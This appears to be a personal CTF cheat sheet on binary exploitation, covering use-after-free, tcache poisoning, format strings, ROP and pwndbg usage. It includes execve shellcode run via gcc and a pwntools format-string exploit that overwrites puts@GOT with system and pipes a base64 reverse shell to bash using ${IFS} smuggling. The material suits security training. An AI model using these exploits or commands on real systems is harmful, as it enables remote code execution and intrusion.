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481 lines (376 loc) · 20.7 KB

File metadata and controls

481 lines (376 loc) · 20.7 KB



# setup script for remote, local, and SSH pwnables
pwn template
  • if: free reference not nulled

    • then: uaf
    • else: tcache poisoning
  • if: no ASLR, stack address not known

    • then: use jmp esp trampoline
  • printf(): 1st param => format string

    • if: len(arg) >= 65537, calls: malloc(), free()
  • strcpy(): len(1st param) -lt len(2nd param) => buffer overflow

  • scanf(): len(2nd param) -lt len(read bytes) => buffer overflow

  • gets(), memcpy(), strcat()

"scanf will quite happily read null bytes. it only stops at white space - strcpy/strcat are the functions you should worry about null bytes" -brx (This means we don't have to worry about the canary having null bytes) - / Pragyan CTF 2019 / Armoury / Writeup

  • buffer size - check allocated frame for locals, take largest offset
  • overwritten return address - jmp to infinite loop, if app hangs, it worked
  • check if payload is malformed - set breakpoint (INT 3 == \xCC), if process doesn't stop, instructions up to breakpoint are malformed
  • process io - use mkfifo + pwntools gdb.attach() to send payloads at specific points

cyclic pattern

python3 -c 'from pwn import *; print(cyclic_gen(string.ascii_uppercase).get(32))'



reading direction: on arrow end, goto next step; each pipe character (|) delimits byte

pwndbg> x/32x 0x100000000
                <-|-|-|-|1      <-|-|-|-|2      <-|-|-|-|3      <-|-|-|-|4
0x100000000:    0x55554000      0x00005555      0x557a2020      0x00005555

validate against byte values:

pwndbg> x/cx 0x100000000
0x100000000:    0x00
pwndbg> x/cx 0x100000001
0x100000001:    0x40
pwndbg> x/cx 0x100000002
0x100000002:    0x55
pwndbg> x/cx 0x100000003
0x100000003:    0x55
pwndbg> x/cx 0x100000008
0x100000008:    0x20
pwndbg> x/cx 0x100000009
0x100000009:    0x20
pwndbg> x/cx 0x10000000a
0x10000000a:    0x7a
pwndbg> x/cx 0x10000000b
0x10000000b:    0x55

last specific type is retained on ambiguous commands, need to be specific again to rollback type change:

pwndbg> x/32x 0x100000000
0x100000000:    0x00    0x40    0x55    0x55    0x55    0x55    0x00    0x00
0x100000008:    0x20    0x20    0x7a    0x55    0x55    0x55    0x00    0x00
0x100000010:    0x00    0xb0    0xff    0xf7    0xff    0x7f    0x00    0x00
0x100000018:    0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
pwndbg> x/32xw 0x100000000
0x100000000:    0x55554000      0x00005555      0x557a2020      0x00005555
0x100000010:    0xf7ffb000      0x00007fff      0x00000000      0x00000000
0x100000020:    0x00000000      0x00000000      0x00000000      0x00000000
0x100000030:    0x00000000      0x00000000      0x00000000      0x00000000
0x100000040:    0x00000000      0x00000000      0x00000000      0x00000000
0x100000050:    0x00000000      0x00000000      0x00000000      0x00000000
0x100000060:    0x00000000      0x00000000      0x00000000      0x00000000
0x100000070:    0x00000000      0x00000000      0x00000000      0x00000000

storing values in locals

0x555555555482    mov    byte ptr [rbp - 0x20], 0xbe
0x555555555486    mov    byte ptr [rbp - 0x1f], 0x43
0x5555555554b2    mov    byte ptr [rbp - 0x14], 0x6e
0x5555555554b6    mov    byte ptr [rbp - 0x13], 0x51
0x5555555554ba    mov    byte ptr [rbp - 0x12], 0xc
0x5555555554be    mov    byte ptr [rbp - 0x11], 0x20
0x5555555554c2    mov    byte ptr [rbp - 0x10], 0

pwndbg> x/32x $rbp - 0x20
0x7fffffffd058: 0x3a1a43be      0xee93c71a      0x3c777f5a      0x200c516e
0x7fffffffd068: 0x00000000      0x00000000      0x38e02000      0x5c4c9d39


# Redress libc with debug symbols
eu-unstrip "$stripped_libc" "$symbol_file"

dynamic loading

# use given libc
patchelf --set-interpreter /path/to/ foo
LD_PRELOAD=./ ./foo

PATH search order


printf 'main(){char a[]="\x48\x31\xd2\x48\x31\xf6\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x50\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05";(*(void(*)())a)();}' | gcc -o /tmp/1 -z execstack -x c - && gdb /tmp/1 -ex 'b main' -ex 'r'

stack overflow

leak stack address

return-into-libc (ret2libc)

One-Gadget RCE


heap exploitation

use-after-free (UAF)

  1. allocate object foo1 with reference to address bar1, array foo points to object
  2. deallocate object foo1, array foo preserves pointer to object's address
  3. allocate object foo2 with reference bar2 to same address as deallocated object foo1 (aka. heap massaging)
  4. array foo (with dangling pointer) dereferences controlled address bar2 written by object foo2, not an object
    • if program reads from address, access value in arbitrary address previously unreadable (aka. memory leak)
    • if program writes to address, write-what-where in stack for rop
  • ! std::string uses in-object buffer for small strings, allocates memory for larger strings

    • => control whether allocations are triggered
  • ! memory manager keeps linked-list of most recently freed address to allocate next objects

  • if race-condition: one thread creates and deletes object, another thread uses object asynchronously

std::string x{"AAAA"}
printf("%zu\n", sizeof(x));
fwrite(&x, 1, sizeof(x), stdout);
// Outputs object with string value

std::string x{"AAAABBBBCCCCDDDD"}
printf("%zu\n", sizeof(x));
fwrite(&x, 1, sizeof(x), stdout);
// Outputs object without string value

Heap massaging:

  • run with socat tcp-listen:31337,reuseaddr exec:"ltrace -e malloc -e free ./foo"
  • || guess layout:
for i in range(20):
    if i % 3 == 0:
        add_book(s, "A" * 39, 600)
        add_book(s, "A" + str(i), 600)

for i in range(2, 20, 2):
    add_fav(s, i + 1)

for i in range(2, 20, 2):
    delete book(s, i + 1)

exp = add_book(s, "A" * 39, 600)

Check controlled registers:

  • e.g. look for 0x41414141



+ free(f_rkusb->buf_head);
- rockusb_func = f_rkusb;
+ rockusb_func = NULL;

tcache poisoning

double free

jit exploitation

format string


  1. Find 1st pattern in leaked addresses

    # 32bit
    fmt_str = "AAAA" + ".%x" * 128
    # take returned values
    x = x.split('.')
  2. Read at address index 123: %123$s


from pwn import *
import requests
from urllib.parse import quote

context (arch='i686', os='Linux')

RHOST = ''
RPORT = '9999'

def getFile(file):
    header = { "Range" : "bytes=0-4096"}
    r = requests.get(f"http://{RHOST}:{RPORT}/{file}", headers=header)
    return r.text

# Step 1. Find Addresses"Finding Binary/LibC Location via /proc/self/maps")
maps = getFile("/proc/self/maps")
addr_bin = maps.split('\n')[0][:8]
addr_libc = maps.split('\n')[6][:8]
log.success(f"Binary is at: 0x{addr_bin}")
log.success(f"Libc is at: 0x{addr_libc}")

# Step 2. Calculate Offsets, Validate first with localhost libc"Finding the address of PUTS + SYSTEM()")
elf = ELF("./httpserver", checksec=False)
libc = ELF("./", checksec=False)
elf.address = int(addr_bin, 16)
libc.address = int(addr_libc, 16)
got_puts =['puts']
system = libc.symbols['system']
log.success(f"Puts@GOT: {hex(got_puts)}")
log.success(f"System@LIBC: {hex(system)}")

# Step 3. Overwrite PUTS with SYSTEM()"Using printf[53] to remap PUTS > SYSTEM")
payload = fmtstr_payload(53, {got_puts : system} )
r = remote(RHOST, RPORT)
# Bash rev shell
base64_rev_shell = "..."
cmd = "echo${IFS}" + base64_rev_shell + "{$IFS}|${IFS}base64${IFS}-d${IFS}|bash"
r.sendline(f"{cmd} {quote(payload)} HTTP/1.1\r\n")

return-oriented programming (rop)

  1. leak stack canary: Given multiple requests for same process, blast (i.e. bruteforce) bytes from boolean-based response

  2. leak base address, map: $rip == rebasing ELF (allows leaking GOT addresses)

    • ~/code/snippets/ctf/pwn/
    • Alternative: manual chain
    ropper --search "pop r??"
    # foreach address (= offset): p64(address + base_address)
    objdump -D _
    # take PLT for write()
    readelf -r _
    # take GOT for write()
    strings -atx libc | grep -i '/bin/sh'
    # take p64(address + base_address)
    # leak write@libc
    # fd = 0x0: reuse previous fd
    rop = pop_rsi_r15 + got_write + p64(0x0)
    rop += pop_rdx + p64(0x8)
    rop += plt_write

sigreturn-oriented programming (srop)


ssl sni support

# remote():
ssl_args = ssl_args or {}
if isinstance(sni, str):
    ssl_args["server_hostname"] = sni
elif sni:
    ssl_args["server_hostname"] = host
if ssl:
    # self.sock = _ssl.wrap_socket(self.sock,**ssl_args)
    self.sock = _ssl.SSLContext().wrap_socket(self.sock,**ssl_args)



case studies